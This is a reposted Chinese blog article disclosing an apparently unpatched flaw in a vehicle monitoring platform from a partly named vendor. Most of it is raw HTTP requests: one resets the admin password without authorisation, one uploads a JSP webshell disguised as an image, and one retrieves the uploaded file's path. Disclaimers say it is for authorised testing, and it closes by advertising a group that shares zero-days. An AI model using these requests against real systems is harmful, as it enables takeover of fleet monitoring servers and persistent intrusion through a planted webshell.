【ZERO day!!】某华车载监控平台漏洞

admin
admin
admin
138734
文章
114
评论
2024年2月10日20:17:35评论29 views字数 3012阅读10分2秒阅读模式

【ZERO day!!】某华车载监控平台漏洞

免责声明

月落星沉研究室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!

    涉及到一些安全问题,本文会对部分关键信息进行隐藏,请各位师傅们见谅!

【ZERO day!!】某华车载监控平台漏洞

登录口

  1. https://x.x.x.x/admin/login_login.action#
  2. https://x.x.x.x/config/user_toLoginPage.action

配置系统任意密码重置

修改为admin/Aa112233

    POST /config/user_passwordReset.action?nowTime=1662449299721 HTTP/1.1    Host: xxxx    Connection: close    Content-Length: 346    sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"    Accept: text/plain, */*; q=0.01    Content-Type: application/x-www-form-urlencoded;charset=UTF-8    X-Requested-With: XMLHttpRequest    sec-ch-ua-mobile: ?0    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36    sec-ch-ua-platform: "macOS"    Origin: https://xxxx    Sec-Fetch-Site: same-origin    Sec-Fetch-Mode: cors    Sec-Fetch-Dest: empty    Referer: https://xxxx/config/user_initPasswordReset.action?t=1662449256362    Accept-Encoding: gzip, deflate    Accept-Language: zh-CN,zh;q=0.9    Cookie: JSESSIONID=8EFCAC96D2EEF42CA0F7ACA18C491016; random=7j0fstzufuu; JSESSIONID=A6683C873CB8549B04A50677BE1BA39A    userBean.loginName=admin&userBean.loginPass=%24D%24S%24S%240778d46eadf8a31cb00ce8d1be64e12e&userBean.questionNumber1=6&userBean.questionAnswer1=1d0383dcf3670a5ea80b017382d66623&userBean.questionNumber2=1&userBean.questionAnswer2=1d0383dcf3670a5ea80b017382d66623&userBean.questionNumber3=7&userBean.questionAnswer3=1d0383dcf3670a5ea80b017382d66623

任意文件上传

默认9002端口 冰蝎马

9002/tcp open  dynamid

    POST /vehicleServer/carDev/icon/import/1?iconType=1 HTTP/1.1    Host: xxxx    Accept: */*    Accept-Encoding: gzip, deflate, br    Content-Length: 872    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydoqRz6gbJn1soiTe    Origin: xxxx    Referer: xxxx/views/client.html    User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.9.1 Chrome/ Safari/537.36    ------WebKitFormBoundarydoqRz6gbJn1soiTe    Content-Disposition: form-data; name="file"; filename="222.jsp"    Content-Type: image/png    GIF89a

获取路劲

GET /vehicleServer/carDev/icon/getIconList?nowTime=164605907220 HTTP/1.1Host: xxxxConnection: closePragma: no-cacheCache-Control: no-cachesec-ch-ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "macOS"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=7853B040E156BC79C6664CAF429AA5E

其他的师傅们自行思考哈

【ZERO day!!】某华车载监控平台漏洞

手头没有几个0day也想混网安圈?苦苦寻找没有合适的技战法?护网值守时摸鱼无聊?

为解决这些问题,本团队创建内部群 护网日报群 吐槽分享护网时的各种状况和经验,互相交流技战法(ps:里面还有红队大佬挖出的0day漏洞分享哦),内部群互相学习交流,名额有限大家赶快加入!!

 添加作者微信拉大家进群:luanshizongyu1234567

【ZERO day!!】某华车载监控平台漏洞

本文由月落星沉团队编写,欢迎各位网安工程师加入月落安全研究实验室,一起学习交流讨论!群聊已满的添加Vx:luanshizongyu1234567,备注进群。

原文始发于微信公众号(月落安全):【ZERO day!!】某华车载监控平台漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月10日20:17:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【ZERO day!!】某华车载监控平台漏洞https://cn-sec.com/archives/2208360.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息